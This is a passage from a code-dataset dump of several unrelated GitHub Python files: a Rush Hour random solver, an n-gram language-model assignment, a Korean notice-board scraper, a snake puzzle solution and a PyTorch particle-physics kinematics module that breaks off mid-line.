완성하기!).py","file_name":"tf08_1_plcaeholder(Placeholder써서 완성하기!).py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12141968674","text":"\"\"\"\nrandomize.py\n\nDit algoritme kiest een willekeurige negatief of positief getal tussen de lengte van het bord - 1. Dit getal representeert een beweging.\n\n\"\"\"\n\nimport os, random, time\nfrom code.classes.game import Game\nfrom code.classes.board import Board\nfrom code.helpers.show_results import show_results\nfrom code.helpers.random_move import random_move\n\ndef randomize(board):\n\n start_time = time.time()\n cars = board.cars.copy()\n current_board = board.board.copy()\n\n steps_list = []\n\n while board.won(current_board) == False:\n\n # generate random car + move\n move = random.choice(list(range(-board.size + 1, board.size - 1)))\n car = random.choice(cars)\n move_car = board.move_car(cars, car, move)\n\n # if move is valid\n if move_car is not False:\n\n # update cars and board, append move to steps\n cars = move_car[0]\n current_board = move_car[1]\n steps_list.append([(car[0], move), current_board])\n\n # measure the time this function has taken to run\n elapsed_time = round(time.time() - start_time, 4)\n\n return board, steps_list, elapsed_time, cars\n","repo_name":"Karim-1/RushHour","sub_path":"code/algorithms/randomize.py","file_name":"randomize.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19821951052","text":"import random\n\n\nroot = ['Ab', 'A', 'A#',\n 'Bb', 'B',\n 'C', 'C#',\n 'Db', 'D', 'D#',\n 'Eb', 'E',\n 'F', 'F#',\n 'Gb', 'G', 'G#']\n\nchord = ['',\n 'm',\n 'Maj6',\n 'Maj7',\n 'm6',\n 'm7',\n '7',\n 'sus4']\n\ndef generateChord():\n chosenRoot = random.choice(root)\n chosenChord = random.choice(chord)\n return chosenRoot+chosenChord\n\nprint()\n#print('Play: ' + generateChord()+ ' (in 2 positions)')\nprint()\n\n","repo_name":"kungfusaini/MusicScripts","sub_path":"giveChord.py","file_name":"giveChord.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15022853860","text":"# author: Chao Chen\n# UNI: cc3736\n\nimport nltk\nimport time\nimport math\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\n# a function that calculates unigram, bigram, and trigram probabilities\n#brown is a python list of the sentences\n#this function outputs three python dictionaries, where the key is a tuple expressing the ngram and the value is the log probability of that ngram\n#make sure to return three separate lists: one for each ngram\ndef calc_probabilities(brown):\n # Three dictionaries used to record the numbers of ngrams in the paragraphs.\n unigram_n = {}\n bigram_n = {}\n trigram_n = {}\n\n uni_denominator = 0\n\n for sentence in brown:\n sentence += \"STOP \"\n tokens = nltk.word_tokenize(sentence) # Type = List\n uni_denominator += tokens.__len__() # Denominator used by unigram\n for token in tokens:\n if (token,) in unigram_n:\n unigram_n[(token,)] += 1\n else:\n unigram_n[(token,)] = 1\n tokens.insert(0, \"*\")\n bigram_tuples = tuple(nltk.bigrams(tokens))\n for one_tuple in bigram_tuples:\n if one_tuple in bigram_n:\n bigram_n[one_tuple] += 1\n else:\n bigram_n[one_tuple] = 1\n tokens.insert(0, \"*\")\n trigram_tuples = tuple(nltk.trigrams(tokens))\n for one_tuple in trigram_tuples:\n if one_tuple in trigram_n:\n trigram_n[one_tuple] += 1\n else:\n trigram_n[one_tuple] = 1\n\n unigram_p = {item[0]: math.log(float(item[1]) / uni_denominator, 2) for item in unigram_n.items()}\n unigram_n[(\"*\",)] = brown.__len__()\n bigram_p = {item[0]: math.log(float(item[1]) / unigram_n[(item[0][0],)], 2) for item in bigram_n.items()}\n bigram_n[(\"*\", \"*\")] = brown.__len__()\n trigram_p = {item[0]: math.log(float(item[1]) / bigram_n[(item[0][0], item[0][1])], 2) for item in\n trigram_n.items()}\n return unigram_p, bigram_p, trigram_p\n\n\n#each ngram is a python dictionary where keys are a tuple expressing the ngram, and the value is the log probability of that ngram\ndef q1_output(unigrams, bigrams, trigrams):\n #output probabilities\n outfile = open('A1.txt', 'w')\n for unigram in unigrams:\n outfile.write('UNIGRAM ' + unigram[0] + ' ' + str(unigrams[unigram]) + '\\n')\n for bigram in bigrams:\n outfile.write('BIGRAM ' + bigram[0] + ' ' + bigram[1] + ' ' + str(bigrams[bigram]) + '\\n')\n for trigram in trigrams:\n outfile.write(\n 'TRIGRAM ' + trigram[0] + ' ' + trigram[1] + ' ' + trigram[2] + ' ' + str(trigrams[trigram]) + '\\n')\n outfile.close()\n\n\n#a function that calculates scores for every sentence\n#ngram_p is the python dictionary of probabilities\n#n is the size of the ngram\n#data is the set of sentences to score\n#this function must return a python list of scores, where the first element is the score of the first sentence, etc. \ndef score(ngram_p, n, data):\n scores = []\n if n == 1:\n for sentence in data:\n line_score = 0\n sentence += \"STOP \"\n unigram_tokens = nltk.word_tokenize(sentence)\n for token in unigram_tokens:\n line_score += ngram_p[(token,)]\n scores.append(line_score)\n elif n == 2:\n for sentence in data:\n line_score = 0\n sentence = \"* \" + sentence + \"STOP \"\n bigram_tuples = tuple(nltk.bigrams(nltk.word_tokenize(sentence)))\n for bigram in bigram_tuples:\n line_score += ngram_p[bigram]\n scores.append(line_score)\n elif n == 3:\n for sentence in data:\n line_score = 0\n sentence = \"* * \" + sentence + \"STOP \"\n trigra_tuples = tuple(nltk.trigrams(nltk.word_tokenize(sentence)))\n for trigram in trigra_tuples:\n line_score += ngram_p[trigram]\n scores.append(line_score)\n return scores\n\n\n#this function outputs the score output of score()\n#scores is a python list of scores, and filename is the output file name\ndef score_output(scores, filename):\n outfile = open(filename, 'w')\n for score in scores:\n outfile.write(str(score) + '\\n')\n outfile.close()\n\n\n#this function scores brown data with a linearly interpolated model\n#each ngram argument is a python dictionary where the keys are tuples that express an ngram and the value is the log probability of that ngram\n#like score(), this function returns a python list of scores\ndef linearscore(unigrams, bigrams, trigrams, brown):\n scores = []\n for sentence in brown:\n line_score = 0\n sentence += \"STOP \"\n unigram_tokens = nltk.word_tokenize(sentence)\n bigram_tokens = nltk.word_tokenize(sentence)\n bigram_tokens.insert(0, \"*\")\n bigram_tuples = tuple(nltk.bigrams(bigram_tokens))\n bigram_tokens.insert(0, \"*\")\n trigram_tuples = tuple(nltk.trigrams(bigram_tokens))\n for i in xrange(unigram_tokens.__len__()):\n uni_score = 2 ** unigrams[(unigram_tokens[i],)] if (unigram_tokens[i],) in unigrams else 0\n bi_score = 2 ** bigrams[bigram_tuples[i]] if bigram_tuples[i] in bigrams else 0\n tri_score = 2 ** trigrams[trigram_tuples[i]] if trigram_tuples[i] in trigrams else 0\n if uni_score == 0 and bi_score == 0 and tri_score == 0:\n line_score = -1000\n break\n else:\n line_score += math.log(1.0 / 3, 2) + math.log(uni_score + bi_score + tri_score, 2)\n scores.append(line_score)\n return scores\n\n\ndef main():\n ts0 = time.time()\n logging.info(\"Processing A1: calculate probabilities.\")\n\n #open data\n infile = open('Brown_train.txt', 'r')\n brown = infile.readlines()\n infile.close()\n\n #calculate ngram probabilities (question 1)\n unigrams, bigrams, trigrams = calc_probabilities(brown)\n\n #question 1 output\n q1_output(unigrams, bigrams, trigrams)\n\n ts1 = time.time()\n logging.info(\"Time cost for A1: \" + str(ts1 - ts0))\n logging.info(\"Processing A2: score brown training data with uni-/bi-/trigrams.\")\n\n #score sentences (question 2)\n uniscores = score(unigrams, 1, brown)\n biscores = score(bigrams, 2, brown)\n triscores = score(trigrams, 3, brown)\n\n #question 2 output\n score_output(uniscores, 'A2.uni.txt')\n score_output(biscores, 'A2.bi.txt')\n score_output(triscores, 'A2.tri.txt')\n\n ts2 = time.time()\n logging.info(\"Time cost for A2: \" + str(ts2 - ts1))\n logging.info(\"Processing A3: Linear interpolation for brown training data.\")\n\n #linear interpolation (question 3)\n linearscores = linearscore(unigrams, bigrams, trigrams, brown)\n\n #question 3 output\n score_output(linearscores, 'A3.txt')\n\n ts3 = time.time()\n logging.info(\"Time cost for A3: \" + str(ts3 - ts2))\n logging.info(\"Processing A5: Linear interpolation for Sample1 and Sample2.\")\n\n #open Sample1 and Sample2 (question 5)\n infile = open('Sample1.txt', 'r')\n sample1 = infile.readlines()\n infile.close()\n infile = open('Sample2.txt', 'r')\n sample2 = infile.readlines()\n infile.close()\n\n #score the samples\n sample1scores = linearscore(unigrams, bigrams, trigrams, sample1)\n sample2scores = linearscore(unigrams, bigrams, trigrams, sample2)\n\n #question 5 output\n score_output(sample1scores, 'Sample1_scored.txt')\n score_output(sample2scores, 'Sample2_scored.txt')\n\n ts4 = time.time()\n logging.info(\"Time cost for A5: \" + str(ts4 - ts3))\n logging.info(\"Total time cost for Part A: \" + str(ts4 - ts0))\n\n\nif __name__ == \"__main__\": main()\n","repo_name":"chenchao9208/Natural_Language_Processing","sub_path":"Assignment 1/submission/solutionsA.py","file_name":"solutionsA.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31300659963","text":"from workers.data_scraper.scraper_dormitory.parser_tools.tools import *\r\n'''\r\n Table Header Warning\r\n CHANNEL_URL : https://www.buk.daegu.kr/index.do?menu_link=/icms/bbs/selectBoardList.do&menu_id=00000196&bbsId=BBSMSTR_000000001052&bbsTyCode=BBST01&bbsAttrbCode=BBSA03&nttId=0&pageIndex=1\r\n Input Table Header : ['번호', '제목', '담당부서', '등록일', '첨부', '조회']\r\n Page Table Header : ['Serial Number', 'Notice Subject', '담당부서', 'Date Created', '첨부', 'Views']\r\n'''\r\ndef post_list_parsing_process(**params):\r\n target_key_info = {\r\n 'multiple_type' : ['post_url', 'is_going_on', 'post_title']\r\n }\r\n var, soup, key_list, _ = html_type_default_setting(params, target_key_info)\r\n lec_list = extract_children_tag(soup, 'div', is_child_multiple=True, child_tag_attrs={'class':'lec_list'})\r\n for lec in lec_list:\r\n a_tag = extract_children_tag(lec, 'a')\r\n href = extract_attrs(a_tag, 'href')\r\n var['post_url'].append(\r\n var['post_url_frame'] + href\r\n )\r\n var['post_title'].append(\r\n extract_text_from_single_tag(lec, 'p', child_tag_attrs={'class':'le_name'})\r\n )\r\n a_tag_text = extract_text(a_tag)\r\n if '접수마감' in a_tag_text:\r\n var['is_going_on'].append(False)\r\n else :\r\n print(var['channel_code'], 'is_going_on 확인 필요')\r\n var['is_going_on'].append(True)\r\n result = merge_var_to_dict(key_list, var)\r\n return result\r\n\r\ndef post_content_parsing_process(**params):\r\n target_key_info = {\r\n 'multiple_type' : ['extra_info']\r\n }\r\n var, soup, key_list, _ = html_type_default_setting(params, target_key_info)\r\n tbody = extract_children_tag(soup, 'tbody', child_tag_attrs={'class':'Thead'})\r\n tmp_meta_data = extract_children_tag(tbody, 'th', is_child_multiple=True)\r\n extra_info = {'info_title':'프로그램 소개'}\r\n for meta_data in tmp_meta_data:\r\n meta_data_name = extract_text(meta_data)\r\n meta_data_value = extract_text(find_next_tag(meta_data))\r\n extra_info.update({f'info_{len(extra_info)}' : (meta_data_name, meta_data_value)})\r\n var['extra_info'].append(extra_info)\r\n result = convert_merged_list_to_dict(key_list, var)\r\n return result\r\n\r\n","repo_name":"choiseulong/chancewave_scraping","sub_path":"scrapingProject/workers/data_scraper/scraper_dormitory/rooms/daegu/dgbukgu/parser_2.py","file_name":"parser_2.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5321045967","text":"# 10875. 뱀 2023-06-07\n\n\nL = int(input())\nN = int(input())\nx, y = 0, 0\nlines = []\nd_list = [(1, 0), (0, 1), (-1, 0), (0, -1)]\nd = 0\nt = 0\n\nfor k in range(N + 1):\n if k == N:\n l, dd = 3 * L, 0\n else:\n l, dd = input().split()\n l = int(l)\n dx, dy = d_list[d]\n nx, ny = x + dx * l, y + dy * l\n type = d % 2 # 0 이면 가로줄, 1이면 세로줄\n new_line = (min(x, nx), min(y, ny), max(x, nx), max(y, ny), type)\n\n dt = 3 * L\n if type == 0 and (new_line[0] < -L or new_line[2] > L):\n dt = L + 1 - x if d == 0 else x + L + 1\n elif type == 1 and (new_line[1] < -L or new_line[3] > L):\n dt = L + 1 - y if d == 1 else y + L + 1\n for line in lines[:-1]:\n if type == 1:\n if line[4] == 1:\n if line[0] != new_line[0]: continue\n if line[3] < new_line[1] or line[1] > new_line[3]: continue\n dt = min(dt, abs(y - line[1]), abs(y - line[3]))\n else:\n if not (new_line[1] <= line[1] <= new_line[3]): continue\n if not (line[0] <= new_line[0] <= line[2]): continue\n dt = min(dt, abs(y - line[1]))\n else:\n if line[4] == 1:\n if not (line[1] <= new_line[1] <= line[3]): continue\n if not (new_line[0] <= line[0] <= new_line[2]): continue\n dt = min(dt, abs(x - line[0]))\n else:\n if line[1] != new_line[1]: continue\n if line[2] < new_line[0] or line[0] > new_line[2]: continue\n dt = min(dt, abs(x - line[0]), abs(x - line[2]))\n if dt != 3 * L:\n print(t + dt)\n exit(0)\n lines.append(new_line)\n \n x += dx * l\n y += dy * l\n t += l\n d = (d + (1 if dd == 'L' else -1)) % 4","repo_name":"MoCCo329/algo_solving","sub_path":"BEAKJOON/10875.py","file_name":"10875.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29367198252","text":"from os import linesep\nimport re\n\n# Saves a adjacency matrix to a file\ndef graph_to_file(W, filename):\n filecontent = \"\"\n for i in range (0, len(W)):\n for j in range (0, len(W)):\n filecontent += str(W[i][j]) + ' '\n filecontent = filecontent.rstrip(' ')\n filecontent += linesep\n filecontent = filecontent.rstrip(linesep)\n try:\n with open(filename, 'w') as text_file:\n text_file.write(filecontent)\n except:\n raise\n\n# Reads a adjacency matrix from a file\ndef file_to_graph(filename):\n # Convert list of strings to list of integers\n def strListToint(ls):\n return [int(i) for i in ls]\n pattern = re.compile(r'\\s+')\n try:\n with open(filename) as input_file:\n lines = []\n for line in input_file:\n # Check if line is empty\n if re.sub(pattern, '', line) == '':\n # Stop reading from input file\n break\n else:\n # Add line to inputed lines\n lines.append(line.rstrip(linesep))\n W = [strListToint(line.split(' ')) for line in lines]\n except:\n raise\n return W","repo_name":"mahdavipanah/ColoredSpanningTree","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"24702695117","text":"import torch\nfrom torch.nn import Module\nfrom torch import Tensor\nimport numpy as np\n\nepsilon = 1e-6\n\n\nclass ExpandFreeQuantities(Module):\n\n def __init__(self, decay_num, target_data, distribution_transform=True):\n super().__init__()\n self.decay_num = decay_num\n self.expand_config = self.calculate_expand_config(target_data)\n self.f_invm_min = self.expand_config[6] + self.expand_config[7]\n self.distribution_transform = distribution_transform\n if distribution_transform:\n self.phi_invm_min = particle_att_utils.distribution_inv_transform(\n torch.tensor([1.006**2]), 1.5, -0.6, -312, 300)\n self.phi_invm_max = particle_att_utils.distribution_inv_transform(\n torch.tensor([1.032**2]), 1.5, -0.6, -312, 300)\n else:\n self.phi_invm_min = torch.tensor([1.006**2])\n self.phi_invm_max = torch.tensor([1.032**2])\n\n def calculate_expand_config(self, x: Tensor):\n psi_px = torch.mean(x[:, ::4].sum(dim=1))\n psi_py = torch.mean(x[:, 1::4].sum(dim=1))\n psi_pz = torch.mean(x[:, 2::4].sum(dim=1))\n psi_E = torch.mean(x[:, 3::4].sum(dim=1))\n metric = torch.tensor([-1, -1, -1, 1])\n kp1_invm = torch.mean(\n torch.sqrt((x[:, :4] * (x[:, :4] * metric)).sum(dim=1)))\n km1_invm = torch.mean(\n torch.sqrt((x[:, 4:8] * (x[:, 4:8] * metric)).sum(dim=1)))\n kp2_invm = torch.mean(\n torch.sqrt((x[:, 8:12] * (x[:, 8:12] * metric)).sum(dim=1)))\n km2_invm = torch.mean(\n torch.sqrt((x[:, 12:16] * (x[:, 12:16] * metric)).sum(dim=1)))\n config = torch.tensor([\n psi_px, psi_py, psi_pz, psi_E, kp1_invm, km1_invm, kp2_invm,\n km2_invm\n ],\n dtype=torch.float64)\n return config\n\n def expand_phi_f(self, x: Tensor, phi_invm_min: Tensor,\n phi_invm_max: Tensor, f_invm_min: Tensor,\n expand_config: Tensor):\n alpha = (x[:, 2] + 1) / 2\n phi_original_invm = phi_invm_min + alpha * (phi_invm_max -\n phi_invm_min)\n if self.distribution_transform:\n phi_invm = particle_att_utils.distribution_transform(\n phi_original_invm, 1.5, -0.6, -312, 300) # 实际invm的平方\n else:\n phi_invm = phi_original_invm\n f_invm_max = expand_config[3] - torch.sqrt(phi_invm)\n alpha_2 = (x[:, 3] + 1) / 2\n f_invm = f_invm_min + alpha_2 * (f_invm_max - f_invm_min)\n theta = torch.unsqueeze(x[:, 0], dim=1) # 这里实际代表的是phi角\n Phi = torch.unsqueeze((x[:, 1] + 1) / 2, dim=1) # 这里实际是theta角,即pz和p的夹角\n phi_p = torch.unsqueeze(particle_att_utils.pdk(\n expand_config[3], f_invm, torch.sqrt(phi_invm)),\n dim=1)\n phi_original_invm = torch.unsqueeze(phi_original_invm, dim=1)\n phi_invm = torch.unsqueeze(phi_invm, dim=1)\n f_invm = torch.unsqueeze(f_invm, dim=1)\n phi_pz = phi_p * torch.cos(torch.pi * Phi)\n phi_px = phi_p * torch.sin(torch.pi * Phi) * torch.cos(\n torch.pi * theta)\n phi_py = phi_p * torch.sin(torch.pi * Phi) * torch.sin(\n torch.pi * theta)\n phi_P = torch.cat([phi_px, phi_py, phi_pz], dim=1)\n phi_E = torch.sqrt(phi_invm +\n torch.sum(phi_P**2, dim=1, keepdim=True) + epsilon)\n phi_momentum = torch.cat([phi_P, phi_E], dim=1)\n phi_pt = torch.sqrt(\n torch.sum(phi_momentum[:, :2]**2, dim=1, keepdim=True) + epsilon)\n phi_p = torch.sqrt(\n torch.sum(phi_momentum[:, :3]**2, dim=1, keepdim=True) + epsilon)\n phi_phi = torch.atan2(phi_momentum[:, 1], phi_momentum[:, 0])\n phi_theta = torch.acos(\n phi_momentum[:, 2] /\n torch.sqrt(phi_momentum[:, 0]**2 + phi_momentum[:, 1]**2 +\n phi_momentum[:, 2]**2 + epsilon))\n angle_config = torch.stack([phi_theta, phi_phi], dim=1)\n return torch.cat([\n phi_momentum, phi_original_invm, f_invm**2, phi_pt, phi_p,\n angle_config\n ],\n dim=1)\n\n def expand_two_k(self, x, config, fmd):\n theta = torch.unsqueeze(x[:, 0], dim=1)\n # Phi = torch.unsqueeze((x[:, 1] + 1) / 2, dim=1)\n Phi = torch.unsqueeze(x[:, 1], dim=1)\n kp_P = torch.unsqueeze(config[:, 6], dim=1)\n kp_pz = kp_P * Phi\n kp_px = kp_P * torch.sqrt(1 - Phi**2 + epsilon) * torch.cos(\n torch.pi * theta)\n kp_py = kp_P * torch.sqrt(1 - Phi**2 + epsilon) * torch.sin(\n torch.pi * theta)\n kp_P = torch.cat([kp_px, kp_py, kp_pz], dim=1)\n km_P = -kp_P\n kp_momentum = torch.cat(\n [kp_P, torch.unsqueeze(config[:, 7], dim=1)], dim=1)\n km_momentum = torch.cat(\n [km_P, torch.unsqueeze(config[:, 7], dim=1)], dim=1)\n\n kp_rotation_momentum = particle_att_utils.Lorentz_inv_trans(\n fmd, kp_momentum)\n km_rotation_momentum = particle_att_utils.Lorentz_inv_trans(\n fmd, km_momentum)\n # kp_lorentz_transformation_momentum = particle_att_utils.lorentz_transformation(\n # kp_momentum, config[:, 4])\n # km_lorentz_transformation_momentum = particle_att_utils.lorentz_transformation(\n # km_momentum, config[:, 4])\n # kp_rotation_momentum = particle_att_utils.rotation(\n # kp_lorentz_transformation_momentum, config[:, 0], config[:, 1],\n # config[:, 2], config[:, 3])\n # km_rotation_momentum = particle_att_utils.rotation(\n # km_lorentz_transformation_momentum, config[:, 0], config[:, 1],\n # config[:, 2], config[:, 3])\n kp_pt = torch.sqrt(\n torch.sum(kp_rotation_momentum[:, :2]**2, dim=1, keepdim=True) +\n epsilon)\n km_pt = torch.sqrt(\n torch.sum(km_rotation_momentum[:, :2]**2, dim=1, keepdim=True) +\n epsilon)\n kp_phi = torch.atan2(kp_rotation_momentum[:, 1],\n kp_rotation_momentum[:, 0])\n kp_theta = torch.acos(\n kp_rotation_momentum[:, 2] /\n torch.sqrt(kp_rotation_momentum[:, 0]**2 +\n kp_rotation_momentum[:, 1]**2 +\n kp_rotation_momentum[:, 2]**2 + epsilon))\n km_phi = torch.atan2(km_rotation_momentum[:, 1],\n km_rotation_momentum[:, 0])\n km_theta = torch.acos(\n km_rotation_momentum[:, 2] /\n torch.sqrt(km_rotation_momentum[:, 0]**2 +\n km_rotation_momentum[:, 1]**2 +\n km_rotation_momentum[:, 2]**2 + epsilon))\n angle_config = torch.stack([kp_theta, kp_phi, km_theta, km_phi], dim=1)\n return torch.cat([\n kp_rotation_momentum, km_rotation_momentum, kp_pt, km_pt,\n angle_config\n ],\n dim=1)\n\n def calculate_mother_particle_config(self, mother_particle, expand_config, son_mass_1, son_mass_2):\n mother_invm = particle_att_utils.get_invm(mother_particle)\n beta = particle_att_utils.get_lorentz_transformation_static_to_moving_velocity(\n mother_particle)\n cz, sz, sy, cy = particle_att_utils.get_lorentz_static_to_moving_rotation_config(\n mother_particle)\n mother_config = torch.stack([cz, sz, sy, cy, beta], dim=1)\n son_static_P = particle_att_utils.pdk(\n torch.sqrt(mother_invm), son_mass_1,\n son_mass_2)\n son_static_E = particle_att_utils.get_static_E(\n torch.sqrt(mother_invm), son_mass_1, son_mass_2)\n mother_config = torch.cat(\n [mother_config, mother_invm, son_static_P, son_static_E], dim=1)\n return mother_config\n\n def expand_forward(self, x: Tensor):\n expand_config = self.expand_config.to(x.device)\n f_invm_min = self.f_invm_min.to(x.device)\n phi_invm_min = self.phi_invm_min.to(x.device)\n phi_invm_max = self.phi_invm_max.to(x.device)\n if self.decay_num == 0:\n return x\n phi_f_config = self.expand_phi_f(x[:, :4], phi_invm_min, phi_invm_max,\n f_invm_min, expand_config)\n if self.decay_num == 1:\n return phi_f_config\n # phi_f_config :[phi_momentum(px,py,pz,E), phi_original_invm, f_invm ** 2, phi_pt, phi_p, angle_config]\n # expand_config :psi_px, psi_py, psi_pz, psi_E, kp1_invm, km1_invm, kp2_invm, km2_invm\n f = torch.cat([\n -phi_f_config[:, :3],\n (self.expand_config[3] - phi_f_config[:, 3]).unsqueeze(dim=1)\n ],\n dim=1)\n f_config = self.calculate_mother_particle_config(\n f, expand_config, expand_config[6], expand_config[7])\n kp2_km2_config = self.expand_two_k(x[:, 4:6], f_config, f)\n if self.decay_num == 2:\n return torch.cat([phi_f_config, kp2_km2_config], dim=1)\n phi_config = self.calculate_mother_particle_config(\n phi_f_config[:, :4], expand_config, expand_config[4], expand_config[5])\n kp1_km1_config = self.expand_two_k(x[:, 6:8], phi_config,\n phi_f_config[:, :4])\n if self.decay_num == 3:\n return torch.cat([phi_f_config, kp2_km2_config, kp1_km1_config],\n dim=1)\n\n def forward(self, x, return_four_momentum=False):\n x = self.expand_forward(x)\n if self.decay_num == 3 and return_four_momentum:\n return torch.cat([x[:, 24:32], x[:, 10:18]], dim=1)\n else:\n return x\n\n\nclass ExpandFourMomentumQuantities(Module):\n\n def __init__(self, decay_num, distribution_transform):\n super().__init__()\n self.decay_num = decay_num\n self.distribution_transform = distribution_transform\n\n def calculate_x_kp1_km1(self, x):\n kp1_rotation_momentum = x[:, :4]\n km1_rotation_momentum = x[:, 4:8]\n kp1_pt = np.sqrt(\n np.sum(kp1_rotation_momentum[:, :2]**2, axis=1, keepdims=True))\n km1_pt = np.sqrt(\n np.sum(km1_rotation_momentum[:, :2]**2, axis=1, keepdims=True))\n kp1_phi = np.arctan2(kp1_rotation_momentum[:, 1],\n kp1_rotation_momentum[:, 0])\n kp1_theta = np.arccos(kp1_rotation_momentum[:, 2] /\n np.sqrt(kp1_rotation_momentum[:, 0]**2 +\n kp1_rotation_momentum[:, 1]**2 +\n kp1_rotation_momentum[:, 2]**2))\n km1_phi = np.arctan2(km1_rotation_momentum[:, 1],\n km1_rotation_momentum[:, 0])\n km1_theta = np.arccos(km1_rotation_momentum[:, 2] /\n np.sqrt(km1_rotation_momentum[:, 0]**2 +\n km1_rotation_momentum[:, 1]**2 +\n km1_rotation_momentum[:, 2]**2))\n angle_config = np.stack([kp1_theta, kp1_phi, km1_theta, km1_phi],\n axis=1)\n return np.concatenate([\n kp1_rotation_momentum, km1_rotation_momentum, kp1_pt, km1_pt,\n angle_config\n ],\n axis=1)\n\n def calculate_target_data(self, x):\n phi = x[:, :4] + x[:, 4:8]\n phi_invm = calculate_invm_2d(phi)\n if self.distribution_transform:\n phi_invm = distribution_inv_transform_fun(phi_invm, 1.5, -0.6,\n -312, 300)\n f = x[:, 8:12] + x[:, 12:]\n f_invm = calculate_invm_2d(f)\n phi_momentum = x[:, :4] + x[:, 4:8]\n kp2_momentum = x[:, 8:12]\n km2_momentum = x[:, 12:16]\n phi_pt = np.sqrt(np.sum(phi_momentum[:, :2]**2, axis=1, keepdims=True))\n kp2_pt = np.sqrt(np.sum(kp2_momentum[:, :2]**2, axis=1, keepdims=True))\n km2_pt = np.sqrt(np.sum(km2_momentum[:, :2]**2, axis=1, keepdims=True))\n phi_p = np.sqrt(np.sum(phi_momentum[:, :3]**2, axis=1, keepdims=True))\n phi_phi = np.arctan2(phi_momentum[:, 1], phi_momentum[:, 0])\n phi_theta = np.arccos(\n phi_momentum[:, 2] /\n np.sqrt(phi_momentum[:, 0]**2 + phi_momentum[:, 1]**2 +\n phi_momentum[:, 2]**2))\n kp2_phi = np.arctan2(kp2_momentum[:, 1], kp2_momentum[:, 0])\n kp2_theta = np.arccos(\n kp2_momentum[:, 2] /\n np.sqrt(kp2_momentum[:, 0]**2 + kp2_momentum[:, 1]**2 +\n kp2_momentum[:, 2]**2))\n km2_phi = np.arctan2(km2_momentum[:, 1], km2_momentum[:, 0])\n km2_theta = np.arccos(\n km2_momentum[:, 2] /\n np.sqrt(km2_momentum[:, 0]**2 + km2_momentum[:, 1]**2 +\n km2_momentum[:, 2]**2))\n angle_config = np.stack(\n [phi_theta, phi_phi, kp2_theta, kp2_phi, km2_theta, km2_phi],\n axis=1)\n if self.decay_num == 1:\n return np.concatenate([\n phi_momentum, phi_invm, f_invm, phi_pt, phi_p,\n angle_config[:, :2]\n ],\n axis=1)\n if self.decay_num >= 2:\n return np.concatenate([\n phi_momentum, phi_invm, f_invm, phi_pt, phi_p,\n angle_config[:, :2], kp2_momentum, km2_momentum, kp2_pt,\n km2_pt, angle_config[:, 2:]\n ],\n axis=1)\n\n def forward(self, x):\n if self.decay_num == 0:\n free_quantities_obj = GetFreeQuantities(x)\n return free_quantities_obj()\n if self.decay_num == 1 or self.decay_num == 2:\n return self.calculate_target_data(x)\n if self.decay_num == 3:\n return np.concatenate(\n [self.calculate_target_data(x),\n self.calculate_x_kp1_km1(x)],\n axis=1)\n\n\nclass GetFreeQuantities(Module):\n\n def __init__(self, fourMomentumData,\n distribution_transform): # data->data of four momentum\n super().__init__()\n self.fourMomentumData = torch.from_numpy(fourMomentumData)\n self.distribution_transform = distribution_transform\n\n def getFreeAttr(\n self): # get some free quantities from four momentum data first\n # fmd means four momentum data\n # four momentum data of the Kplus and Kminus from Phi particle\n x = self.fourMomentumData[:, :8]\n y = self.fourMomentumData[:, 8:16]\n # four momentum data (fmd) of the Phi and F particle\n self.Phi_Kp_fmd = x[:, :4]\n self.F_Kp_fmd = y[:, :4]\n self.Phi_fmd = torch.stack([\n x[:, ::4].sum(dim=1), x[:, 1::4].sum(dim=1), x[:, 2::4].sum(dim=1),\n x[:, 3::4].sum(dim=1)\n ],\n dim=1)\n self.F_fmd = torch.stack([\n y[:, ::4].sum(dim=1), y[:, 1::4].sum(dim=1), y[:, 2::4].sum(dim=1),\n y[:, 3::4].sum(dim=1)\n ],\n dim=1)\n\n self.Phi_theta = particle_att_utils.get_theta(\n self.Phi_fmd) # 因为对接问题,这个theta角代表Pz和P的夹角,将被储存在第二列\n self.Phi_phi = particle_att_utils.get_phi(self.Phi_fmd)\n self.Phi_invm = torch.sqrt(particle_att_utils.get_invm(self.Phi_fmd))\n\n kp2_invm = torch.mean(torch.sqrt(particle_att_utils.get_invm(\n y[:, :4])))\n km2_invm = torch.mean(\n torch.sqrt(particle_att_utils.get_invm(y[:, 4:8])))\n self.F_invm_min = kp2_invm + km2_invm\n Psi_invm = torch.sum(\n self.fourMomentumData[:, 3::4], dim=1, keepdim=True)\n self.F_invm_max = Psi_invm - self.Phi_invm\n\n self.F_invm = torch.sqrt(particle_att_utils.get_invm(self.F_fmd))\n\n def conver(self): # transform the free quantities to (-1,1)\n\n self.Phi_theta_tran = 2 * (\n self.Phi_theta / torch.pi) - 1 # (0,pi) -> (0,1) -> (0,2) -> (-1,1)\n self.Phi_phi_tran = self.Phi_phi / torch.pi # (-pi,pi) -> (-1,1)\n\n if self.distribution_transform:\n Phi_invm_DisTran = particle_att_utils.distribution_inv_transform(\n self.Phi_invm**2, 1.5, -0.6, -312, 300)\n else:\n Phi_invm_DisTran = self.Phi_invm**2\n # get the maximun and minimun of Phi_invm which has been distribution transformed\n if self.distribution_transform:\n Phi_invm_max = particle_att_utils.distribution_inv_transform(\n torch.tensor(1.032**2), 1.5, -0.6, -312, 300)\n Phi_invm_min = particle_att_utils.distribution_inv_transform(\n torch.tensor(1.006**2), 1.5, -0.6, -312, 300)\n else:\n Phi_invm_max = torch.tensor(1.032**2)\n Phi_invm_min = torch.tensor(1.006**2)\n self.Phi_invm_tran = 